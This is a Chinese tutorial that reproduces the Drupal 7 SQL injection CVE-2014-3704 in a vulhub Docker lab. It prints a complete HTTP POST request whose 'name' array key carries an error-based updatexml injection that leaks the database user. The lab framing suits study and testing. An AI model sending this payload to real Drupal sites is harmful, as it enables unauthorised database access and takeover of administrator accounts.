温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何进行Drupal SQL注入漏洞CVE-2014-3704的复现

发布时间:2021-12-29 17:46:34 来源:亿速云 阅读:296 作者:柒染 栏目:安全技术

如何进行Drupal SQL注入漏洞CVE-2014-3704的复现,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。

Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。

影响版本: 7.0~7.31

下面仅作漏洞复现记录与实现,利用流程如下:

一、漏洞环境

本环境采用vulhub搭建

执行以下指令完成环境搭建

cd drupal/CVE-2014-3704/

docker-compose up -d

启动完毕后会开启8080端口

漏洞链接:http://192.168.101.152:8080/

如何进行Drupal SQL注入漏洞CVE-2014-3704的复现

初次访问需要安装,采用默认安装即可,Mysql数据库名填写drupal,数据库用户名、密码为root,地址为mysql

如何进行Drupal SQL注入漏洞CVE-2014-3704的复现

安装完成后,访问首页如下:

如何进行Drupal SQL注入漏洞CVE-2014-3704的复现

二、漏洞利用

直接发送数据包

POST /?q=node&destination=node HTTP/1.1
Host: 192.168.101.152:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

即可触发漏洞,注意Content-Type要设置为application/x-www-form-urlencoded

如何进行Drupal SQL注入漏洞CVE-2014-3704的复现

查询数据库

如何进行Drupal SQL注入漏洞CVE-2014-3704的复现

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI